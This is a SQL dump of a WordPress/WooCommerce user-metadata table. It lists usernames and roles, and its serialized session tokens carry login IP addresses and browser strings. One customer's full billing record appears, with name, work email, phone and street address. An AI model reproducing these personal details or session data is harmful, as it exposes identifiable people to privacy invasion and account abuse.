INSERT INTO `wp_usermeta` VALUES (14601, 952, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14602, 953, 'nickname', 'trond.aniksdal'); 
INSERT INTO `wp_usermeta` VALUES (14603, 953, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14604, 953, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14605, 953, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14606, 953, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14607, 953, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14608, 953, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14609, 953, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14610, 953, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14611, 953, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14612, 953, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14613, 953, '_yoast_wpseo_profile_updated', '1494486335'); 
INSERT INTO `wp_usermeta` VALUES (14614, 953, 'session_tokens', 'a:1:{s:64:"eaa6f59d46e56626b730a98ceafac649f4c112e133d879c4eb3da1811f86bb01";a:4:{s:10:"expiration";i:1495695946;s:2:"ip";s:14:"147.108.253.74";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494486346;}}'); 
INSERT INTO `wp_usermeta` VALUES (14615, 954, 'nickname', 'jreed'); 
INSERT INTO `wp_usermeta` VALUES (14616, 954, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14617, 954, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14618, 954, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14619, 954, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14620, 954, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14621, 954, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14622, 954, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14623, 954, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14624, 954, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14625, 954, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14626, 954, '_yoast_wpseo_profile_updated', '1494492091'); 
INSERT INTO `wp_usermeta` VALUES (14627, 954, 'session_tokens', 'a:1:{s:64:"cc12a571fe239daf7a98d161e0d45b999c5676c71e885a99cf3f924031641526";a:4:{s:10:"expiration";i:1500201201;s:2:"ip";s:12:"182.71.39.42";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36";s:5:"login";i:1500028401;}}'); 
INSERT INTO `wp_usermeta` VALUES (14628, 955, 'nickname', 'jonathan.duron'); 
INSERT INTO `wp_usermeta` VALUES (14629, 955, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14630, 955, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14631, 955, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14632, 955, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14633, 955, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14634, 955, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14635, 955, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14636, 955, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14637, 955, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14638, 955, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14639, 955, '_yoast_wpseo_profile_updated', '1494505714'); 
INSERT INTO `wp_usermeta` VALUES (14640, 955, 'session_tokens', 'a:1:{s:64:"30c1a61ecd6bf51379330ce43b0ce1adfe3df7bae67c0f11b45611afe9865eaa";a:4:{s:10:"expiration";i:1495715324;s:2:"ip";s:14:"199.107.26.250";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1494505724;}}'); 
INSERT INTO `wp_usermeta` VALUES (14641, 955, 'billing_first_name', 'Jonathan'); 
INSERT INTO `wp_usermeta` VALUES (14642, 955, 'billing_last_name', 'Duron'); 
INSERT INTO `wp_usermeta` VALUES (14643, 955, 'billing_company', 'Nexteer Automotive'); 
INSERT INTO `wp_usermeta` VALUES (14644, 955, 'billing_email', 'jonathan.duron@nexteer.com'); 
INSERT INTO `wp_usermeta` VALUES (14645, 955, 'billing_phone', '6163758155'); 
INSERT INTO `wp_usermeta` VALUES (14646, 955, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (14647, 955, 'billing_address_1', '3900 E. Holland Road'); 
INSERT INTO `wp_usermeta` VALUES (14648, 955, 'billing_address_2', 'Plant 3'); 
INSERT INTO `wp_usermeta` VALUES (14649, 955, 'billing_city', 'Saginaw'); 
INSERT INTO `wp_usermeta` VALUES (14650, 955, 'billing_state', 'MI'); 
INSERT INTO `wp_usermeta` VALUES (14651, 955, 'billing_postcode', '48601'); 
INSERT INTO `wp_usermeta` VALUES (14652, 956, 'nickname', 'mdrey'); 
INSERT INTO `wp_usermeta` VALUES (14653, 956, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14654, 956, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14655, 956, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14656, 956, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14657, 956, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14658, 956, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14659, 956, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14660, 956, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14661, 956, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14662, 956, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14663, 956, '_yoast_wpseo_profile_updated', '1494505893'); 
INSERT INTO `wp_usermeta` VALUES (14664, 956, 'session_tokens', 'a:1:{s:64:"d715ff18fe64a11e59f3a2b50ce9e763ed5078b6b0c8dd063a58b57654223843";a:4:{s:10:"expiration";i:1495715509;s:2:"ip";s:13:"192.107.155.5";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494505909;}}'); 
INSERT INTO `wp_usermeta` VALUES (14665, 957, 'nickname', 'mesut.koc1995'); 
INSERT INTO `wp_usermeta` VALUES (14666, 957, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14667, 957, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14668, 957, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14669, 957, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14670, 957, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14671, 957, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14672, 957, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14673, 957, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14674, 957, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14675, 957, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14676, 957, '_yoast_wpseo_profile_updated', '1494509476'); 
INSERT INTO `wp_usermeta` VALUES (14677, 957, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14678, 958, 'nickname', 'johnlee3101980'); 
INSERT INTO `wp_usermeta` VALUES (14679, 958, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14680, 958, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14681, 958, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14682, 958, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14683, 958, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14684, 958, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14685, 958, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14686, 958, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14687, 958, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14688, 958, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14689, 958, '_yoast_wpseo_profile_updated', '1494512058'); 
INSERT INTO `wp_usermeta` VALUES (14690, 958, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14691, 959, 'nickname', 'jwojo'); 
INSERT INTO `wp_usermeta` VALUES (14692, 959, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14693, 959, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14694, 959, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14695, 959, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14696, 959, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14697, 959, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14698, 959, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14699, 959, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14700, 959, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14701, 959, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14702, 959, '_yoast_wpseo_profile_updated', '1494513960'); 
INSERT INTO `wp_usermeta` VALUES (14703, 959, 'session_tokens', 'a:1:{s:64:"3745f49ab63fb2dd631ec4173fb3693eeb9ef8cae114c18e96caf5288cc469dd";a:4:{s:10:"expiration";i:1495723570;s:2:"ip";s:13:"130.199.3.165";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494513970;}}'); 
INSERT INTO `wp_usermeta` VALUES (14704, 317, 'session_tokens', 'a:2:{s:64:"8579a3ec868572620a35d4ce3f4858e072618da717dd881c59e20bd9e1b5746d";a:4:{s:10:"expiration";i:1501873275;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501700475;}s:64:"4ee3eb1cd0bc1b2187a1cc520b195e0db1691a6fe4f0835c2b9628af094232af";a:4:{s:10:"expiration";i:1501876840;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501704040;}}'); 
INSERT INTO `wp_usermeta` VALUES (14705, 960, 'nickname', 'dale.w.armstrong'); 
INSERT INTO `wp_usermeta` VALUES (14706, 960, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14707, 960, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14708, 960, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14709, 960, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14710, 960, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14711, 960, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14712, 960, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14713, 960, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14714, 960, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14715, 960, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14716, 960, '_yoast_wpseo_profile_updated', '1494521771'); 
INSERT INTO `wp_usermeta` VALUES (14717, 960, 'session_tokens', 'a:1:{s:64:"8128fd4cd86fcd8d81540a5704718ae8bfe2883d3f21a74abfb5529b4a360952";a:4:{s:10:"expiration";i:1495731381;s:2:"ip";s:12:"130.76.24.20";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1494521781;}}'); 
INSERT INTO `wp_usermeta` VALUES (14718, 961, 'nickname', 'lhernandez'); 
INSERT INTO `wp_usermeta` VALUES (14719, 961, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14720, 961, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14721, 961, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14722, 961, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14723, 961, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14724, 961, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14725, 961, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14726, 961, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14727, 961, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14728, 961, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14729, 961, '_yoast_wpseo_profile_updated', '1495808070'); 
INSERT INTO `wp_usermeta` VALUES (14730, 961, 'session_tokens', 'a:2:{s:64:"2d3aa4fc11c0ecb14fa11b45f04aef1f5f83540004d2206144a253d6fb39372d";a:4:{s:10:"expiration";i:1496508249;s:2:"ip";s:13:"68.14.206.239";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496335449;}s:64:"502a823b88815504df13fe10934922741e95cf86d28372868cf90748179d8faa";a:4:{s:10:"expiration";i:1496508545;s:2:"ip";s:13:"68.14.206.239";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496335745;}}'); 
INSERT INTO `wp_usermeta` VALUES (14731, 961, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (14732, 962, 'nickname', 'jeanette.eastman'); 
INSERT INTO `wp_usermeta` VALUES (14733, 962, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14734, 962, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14735, 962, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14736, 962, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14737, 962, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14738, 962, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14739, 962, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14740, 962, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14741, 962, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14742, 962, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14743, 962, '_yoast_wpseo_profile_updated', '1494529888'); 
INSERT INTO `wp_usermeta` VALUES (14744, 962, 'session_tokens', 'a:1:{s:64:"bdb31b41860f3a245ac287fd190b10fbc29d0c6e77fed0e05e8a197481019ae9";a:4:{s:10:"expiration";i:1495739498;s:2:"ip";s:14:"50.232.182.123";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494529898;}}'); 
INSERT INTO `wp_usermeta` VALUES (14745, 963, 'nickname', 'amna.shah2010'); 
INSERT INTO `wp_usermeta` VALUES (14746, 963, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14747, 963, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14748, 963, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14749, 963, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14750, 963, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14751, 963, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14752, 963, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14753, 963, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14754, 963, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14755, 963, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14756, 963, '_yoast_wpseo_profile_updated', '1494532101'); 
INSERT INTO `wp_usermeta` VALUES (14757, 963, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14758, 964, 'nickname', 'joseph.ferreira'); 
INSERT INTO `wp_usermeta` VALUES (14759, 964, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14760, 964, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14761, 964, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14762, 964, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14763, 964, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14764, 964, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14765, 964, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14766, 964, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14767, 964, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14768, 964, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14769, 964, '_yoast_wpseo_profile_updated', '1494533263'); 
INSERT INTO `wp_usermeta` VALUES (14771, 965, 'nickname', 'sstilman2004'); 
INSERT INTO `wp_usermeta` VALUES (14772, 965, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14773, 965, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14774, 965, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14775, 965, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14776, 965, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14777, 965, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14778, 965, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14779, 965, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14780, 965, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14781, 965, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14782, 965, '_yoast_wpseo_profile_updated', '1494533698'); 
INSERT INTO `wp_usermeta` VALUES (14783, 965, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14784, 966, 'nickname', 'tshir311984'); 
INSERT INTO `wp_usermeta` VALUES (14785, 966, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14786, 966, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14787, 966, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14788, 966, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14789, 966, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14790, 966, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14791, 966, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14792, 966, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14793, 966, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14794, 966, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14795, 966, '_yoast_wpseo_profile_updated', '1494538173'); 
INSERT INTO `wp_usermeta` VALUES (14796, 966, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14797, 967, 'nickname', 'monzaman241950'); 
INSERT INTO `wp_usermeta` VALUES (14798, 967, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14799, 967, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14800, 967, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14801, 967, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14802, 967, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14803, 967, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14804, 967, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14805, 967, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14806, 967, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14807, 967, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14808, 967, '_yoast_wpseo_profile_updated', '1494541555'); 
INSERT INTO `wp_usermeta` VALUES (14809, 967, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14810, 968, 'nickname', 'sknoke1959'); 
INSERT INTO `wp_usermeta` VALUES (14811, 968, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14812, 968, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14813, 968, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14814, 968, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14815, 968, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14816, 968, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14817, 968, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14818, 968, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14819, 968, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14820, 968, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14821, 968, '_yoast_wpseo_profile_updated', '1494553893'); 
INSERT INTO `wp_usermeta` VALUES (14822, 968, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14823, 969, 'nickname', 'zarah_minhas1998'); 
INSERT INTO `wp_usermeta` VALUES (14824, 969, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14825, 969, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14826, 969, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14827, 969, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14828, 969, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14829, 969, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14830, 969, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14831, 969, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14832, 969, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14833, 969, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14834, 969, '_yoast_wpseo_profile_updated', '1494556249'); 
INSERT INTO `wp_usermeta` VALUES (14835, 969, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14836, 970, 'nickname', 'melodyhovell'); 
INSERT INTO `wp_usermeta` VALUES (14837, 970, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14838, 970, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14839, 970, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14840, 970, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14841, 970, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14842, 970, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14843, 970, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14844, 970, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14845, 970, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14846, 970, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14847, 970, '_yoast_wpseo_profile_updated', '1494559854'); 
INSERT INTO `wp_usermeta` VALUES (14848, 970, 'session_tokens', 'a:1:{s:64:"785054c64f43273a771c111165183957bf46c0fe413e0120fc01d0dffb8bdd5b";a:4:{s:10:"expiration";i:1495769464;s:2:"ip";s:12:"23.81.70.163";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1494559864;}}'); 
INSERT INTO `wp_usermeta` VALUES (14849, 970, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (14850, 971, 'nickname', 'sgreen011973'); 
INSERT INTO `wp_usermeta` VALUES (14851, 971, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14852, 971, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14853, 971, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14854, 971, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14855, 971, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14856, 971, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14857, 971, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14858, 971, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14859, 971, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14860, 971, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14861, 971, '_yoast_wpseo_profile_updated', '1494563369'); 
INSERT INTO `wp_usermeta` VALUES (14862, 971, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14863, 972, 'nickname', 'abcglobal62'); 
INSERT INTO `wp_usermeta` VALUES (14864, 972, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14865, 972, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14866, 972, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14867, 972, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14868, 972, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14869, 972, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14870, 972, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14871, 972, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14872, 972, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14873, 972, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14874, 972, '_yoast_wpseo_profile_updated', '1494568297'); 
INSERT INTO `wp_usermeta` VALUES (14875, 972, 'session_tokens', 'a:1:{s:64:"f3d5652d3605365033c5dd54d6bb88601e119b956798e5206aa630438aa45ea2";a:4:{s:10:"expiration";i:1495777908;s:2:"ip";s:14:"182.75.123.178";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494568308;}}'); 
INSERT INTO `wp_usermeta` VALUES (14876, 973, 'nickname', 'jgallag'); 
INSERT INTO `wp_usermeta` VALUES (14877, 973, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14878, 973, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14879, 973, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14880, 973, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14881, 973, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14882, 973, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14883, 973, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14884, 973, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14885, 973, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
